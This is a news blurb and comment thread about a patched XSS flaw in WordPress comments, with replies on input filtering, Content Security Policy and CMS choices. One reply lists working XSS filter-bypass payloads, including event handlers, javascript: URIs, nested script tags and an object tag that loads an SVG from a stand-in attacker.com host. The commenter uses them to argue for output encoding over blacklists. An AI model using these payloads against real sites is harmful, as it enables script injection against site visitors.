Critical XSS Flaws Patched In WordPress and Popular Plug-In

itwbennett writes The WordPress development team on Thursday released critical security updates that address an XSS vulnerability in the comment boxes of WordPress posts and pages. An attacker could exploit this flaw to create comments with malicious JavaScript code embedded in them that would get executed by the browsers of users seeing those comments. 'In the most obvious scenario the attacker leaves a comment containing the JavaScript and some links in order to put the comment in the moderation queue,' said Jouko Pynnonen, the security researcher who found the flaw.

Re:Regular expressions

[Spy+Handler]

Wouldn't simply stripping out "
Like, whatever the user posted doesn't have to look properly formatted or anything, he's trying to inject malicious javascript... the Wordpress site owner will be deleting the comment as soon as it's discovered, right?

Re:There's a solution

[Dracos]

The real question is, Why is anybody still runing WordPress?

Re:Regular expressions

[cbhacking]

<img src="xss" onerror="alert('Nope!')" />
<iframe src="javascript:alert('That won't work.')"></iframe>
<object data="http://attacker.com/SvgCanContainScriptsAndCanUseTheParentObjectToAttackTheHostingPage.svg"></object>
<scri<scriptpt>alert("In fact, that kind of blacklisting is trivial to bypass.");</script>
<form action="javascript:alert('I once spent a month breaking a client's blacklist every time they updated it to block my last POC exploit, telling them all the while they had to use output encoding.');"><input type="submit" value="SPOILER" /></form>
<h1 onmouseover="alert('They eventually did, but oh man did they waste a lot of time trying variants on your suggestion first!')">REALLY BIG TEXT THAT YOUR MOUSE WILL GO OVER</h1>

People thinking like you do frequently leads to exactly this sort of problem, where something *supposedly* has XSS protection but in fact totally doesn't. With the possible exception of the nested script tags (if you're smart enough to run the filter repeatedly until no further hits occur, that'll be caught), every single one of these lines will execute arbitrary attacker-controlled JavaScript through the filter that you propose. I strongly recommend that you go read OWASP, especially the top 10, and in the meantime I hope you haven't written any in-production web applications...

Content Security Policy

[Njovich]

One highly underused technology is the Content Security Policy. It is supported in all major browsers, including IE10+.

With simple headers you can prevent anyone from using inline javascript or including scripts from non-whitelisted domains. For instance, the following headers would make inline scripts not execute, and only execute javascript from the whitelisted domains:

Content-Security-Policy: script-src 'self' www.google-analytics.com ajax.googleapis.com;
X-Content-Security-Policy: script-src 'self' www.google-analytics.com ajax.googleapis.com;

If projects like Wordpress would pick this up, it would make it very difficult to do XSS attacks.

Re:There's a solution

[drinkypoo]

The real question is, Why is anybody still runing WordPress?

Because Drupal has security flaws, too.

Not everyone wants to write their own CMS and deal with the security issues. Wordpress probably is the absolutely worst choice, though.

Re:There's a solution

[Zedrick]

Because it's very easy to use for people with their own domain but little tech knowledge, it has a massive amount of themes and plugins to choose from (which I admit can be a problem) and it has much less security issues than any comparable CMS.

I've worked with hosting abuse for a long time, and it's fairly rare to see a hacked WP nowadays - unless the owner of the site has turned off auto-updating. Hacked Joomla-, modX- or Drupal-sites are much more common.